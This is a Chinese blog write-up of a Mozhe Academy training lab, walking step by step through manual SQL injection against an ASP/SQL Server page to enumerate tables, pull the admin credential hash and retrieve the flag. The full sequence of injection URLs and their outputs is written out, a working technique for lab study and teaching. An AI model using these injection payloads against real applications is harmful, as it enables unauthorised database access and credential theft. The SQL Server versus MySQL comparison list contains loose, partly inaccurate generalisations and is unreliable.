SQL手工注入漏洞测试(Sql Server数据库)-墨者

于 2023-12-06 22:31:13 发布
阅读量1.2k 收藏 18
点赞数 25
分类专栏: 靶场攻防 文章标签: 数据库 sql sql注入 手工注入 mssql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weoptions/article/details/134758905
版权

———靶场专栏———

声明:文章由作者weoptions学习或练习过程中的步骤及思路,非正式答案,仅供学习和参考。

靶场背景:

来源:

        墨者学院

简介:

        安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Sql Server,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标:

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Sql Server的数据结构;
4.了解字符串的MD5加解密;

解题方向:

        手工进行SQL注入测试,获取管理密码登录。

解题思路:

        还是老套路,测试注入点,利用sql语句去找到用户账号信息,这个b密码肯定又是md5加密,能不能来点新套路(抓脸.jpg)。

靶场启动!!!我的墨币啊┭┮﹏┭┮,望大佬点赞回血。

还是那个熟悉的界面,我们点进去关于平台停机维护的通知。

http://219.153.49.228:41966/new_list.asp?id=2

整型注入点吗?我们先找找Sql Server和MySQL数据库的区别。

SQL Server和MySQL数据库的区别如下:

  1. 平台支持:SQL Server主要支持Windows平台,而MySQL则支持许多平台,包括Linux和Windows平台。
  2. 语法:SQL Server的语法相对简单易用,而MySQL的语法则较为复杂。
  3. 存储引擎:MySQL有多种存储引擎可供选择,而SQL Server则仅使用一个或单个存储引擎。
  4. 备份方式:在使用MySQL时,开发人员必须通过将所有数据提取为SQL语句来备份数据。而SQL Server在备份数据时不会阻止数据库,这使得用户能够备份和恢复大量数据,而无需花费额外的时间和精力。
  5. 性能:SQL Server被视为大型数据库,稳定且能做一般大系统的数据仓库,运行速度明显比MySQL快(尤其是海量数据下)。
  6. 价格:SQL Server的价格相对较高,而MySQL是免费的。
  7. 可扩展性:MySQL在可扩展性方面表现得更好,它允许开发人员根据性能更灵活地为表使用存储引擎。
  8. 社区支持:MySQL有一个庞大的开发者社区,提供了大量的教程、论坛和资源,使得开发人员可以很容易地获取帮助和支持。相比之下,虽然SQL Server也有一个活跃的社区,但其开发者社区规模可能不如MySQL。

纯套话,《国产ai.jpg》,我们再找找Sql Server和MySQL数据库在进行sql注入测试时候的区别吧。搜完了感觉除了注释符号不一样,MSSQL(sql server) 最高权限是sa,其他的大差不差,问题不大,我们就按mysql的来,出现错误了我们再去改。

解题步骤:

        

        一、验证注入点

http://219.153.49.228:41966/new_list.asp?id=2

对id这个参数进行尝试

http://219.153.49.228:41966/new_list.asp?id=2 and 1=1

ok正常访问,试试这个

http://219.153.49.228:41966/new_list.asp?id=2 and 1=2

访问不正常了,那注入点就在这里啦(苍蝇搓手.jpg)

        二、order by猜列

http://219.153.49.228:41966/new_list.asp?id=-2 union order by 1,2,3,4

昂?我们去w3school里面找找有没有相关的注入语句。

哦哦哦哦哦,order by 不用联合注入,而且只能传入一个参数,给忘了。猜列的时候,发现只有1,2,4显示了页面,可能有四个列。

        三、检查回显

http://219.153.49.228:41966/new_list.asp?id=-2 union select 1,2,4

昂?这是怎么了?系统应该是检测这个字符的,我们用小葵转换一下编码试试。能行,但不完全行,我找找其他资料吧。ooo原来是语句不正确。

我们测回显用这个语句

http://219.153.49.228:48244/new_list.asp?id=-2 union all select null,'null','null',null

 我们去一个个给每个null加上单引号。

也可以用order by +number

http://219.153.49.228:44214/new_list.asp?id=-2 union all select 1,2,'3',4

最后把3用字符串表示(加了个单引号)能正常回显。说明第二和第三列有回显,第二列是整型,第三列是字符型

        四、获取数据库信息

+++

@@version 获取版本信息

http://219.153.49.228:44214/new_list.asp?id=-2 union all select 1,@@version,'3',4

        Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

+++

db_name()当前数据库名字

http://219.153.49.228:44214/new_list.asp?id=-2 union all select 1,db_name(),'3',4

        mozhe_db_v2

+++

user、system_user、current_user、user_name获取当前数据库用户名

http://219.153.49.228:44214/new_list.asp?id=-2 union all select 1,user,'3',4

        dbo

+++

@@SERVERNAME 获取服务器主机信息

http://219.153.49.228:44214/new_list.asp?id=-2 union all select 1,@@SERVERNAME,'3',4

        MOBAN9527\SQLEXPRESS

        五、查数据库表信息

http://219.153.49.228:44214/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='U'),'3',4

sysobjects:记录了数据库中所有表,常⽤字段为id、name和xtype。

注入语句:top 1(查询前1条数据)+name(查name字段)+mozhe_db_v2.dbo.sysobjects(当前数据库.dbo.sysobjects系统自带用户)+xtype='U'(限定user信息,dbo用户创建的表)

查询到的是manage表,用and name not in看看还有没其他的

id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='U' and name not in ('manage')),'3',4

再看看有没有其他的

id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='U' and name not in ('manage','announcement')),'3',4

没有了。接下来就是根据查到的数据库表信息去查列的信息了。

        六、查数据库表信息

我们查到跟dbo有关的数据库表就是manage,announcement了。announcement替你们查过了,跟flag没关系。直接展示manage了。

syscolumns:记录了数据库中所有表的字段,常⽤字段为id、name和xtype。

object ():数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回当前数据库用户创建的对像的ID。

col_name():可以根据id值得到对像的名称,而且可以返回指定下标的结果.

/new_list.asp?id=-1 union all select 1,(select username from manage),'a',4

查询(object_id('manage'),1)(object_id('manage'),2)(object_id('manage'),3)返回的分别是id,username,password。

        七、查数据

直接从manage表中查就行。

219.153.49.228:47026/new_list.asp?id=-2 union all select 1,(select username from manage),'a',4

admin_mz

219.153.49.228:47026/new_list.asp?id=-2 union all select 1,(select password from manage),'a',4

72e1bfc3f01b7583

MD5解密后为97285101

登陆拿到KEY: mozhea025436360d9d78553ba4c4a754

总结:

        难度:★★★★☆☆☆☆☆☆

        解析:整体难度有点稍高,因为和mysql语法有点区别,查数据方式也不太一样。好在思路没啥出入。记录一下手工注入流程,提高对MSSQL数据库的理解。

weoptions
关注
  • 25
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sql手工注入实战
mulincong的博客
05-30 2229
sql手工注入封神台靶场
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
weixin_42939822的博客
03-16 3564
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
安全测试-SQL注入
qq_42008891的博客
03-08 1392
SQL注入是针对一种数据库而言的,而不是针对网页语言。在任何使用了数据库查询环境下都可能存在。常见的数据库包括:MySQL、Oracle、Db2等。针对不同的数据库系统使用的一些函数会有所不同,不过从测试是否存在SQL注入的角度考虑,只需要进行几个最基本的判断语句就可以了。由于SQL注入有可能造成信息泄漏,在严重情况下(根据使用的数据库而定)甚至可能造成数据修改、删除,从而导致业务中断。因此必须发现所有存在的注入点。
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1244
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
SQL手工注入漏洞测试(MySQL数据库)
chinacqzgp的博客
09-18 1746
墨者学院靶场,sql注入,MySQL数据库
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
SQL手工注入漏洞测试(Sql Server数据库)
技术超强的网络安全平台
11-28 1086
      还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段。此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL注入。 一、盲注 盲猜爆出表名   通过SQL语句中的and exists(select username from manage)查询,判断mana.
刷题笔记:SQL手工注入漏洞测试(Sql Server数据库
m0_67399862的博客
03-26 912
进入网页后,用and语句来判断是否有注入点,当输入and 1=2时,页面报错,而输入and 1=1时,页面恢复,说明可能存在注入点 用order by 语句来判断字段数,因为order by5时页面报错,而order by4时页面没有报错,则说明该字段数为4 用union select语句,但页面报错,网页不兼容,则上网查了查,需要用union all select 但页面仍然报错,考虑字符串的问题,后面的数字逐个加单引号试,直至页面不报错 然后将2的位置换为d...
SQL 注入 五大基本手法
weixin_51559599的博客
11-07 966
适用数据库中的来的情况。联合查询就是利用语句,该语句会同时执行两条 select 语句,实现跨库、跨表查询。
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2426
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
多崎巡礼的博客
07-27 6891
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。 开启靶场环境: 第1步: 页面提交:http://mozhe.cn/new_list.php?id=2 数据库执行语句:select * from manage w...
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3899
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者学院——SQL手工注入漏洞测试(MySQL数据库)》
weixin_47118413的博客
06-21 2357
背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2223
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weoptions

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值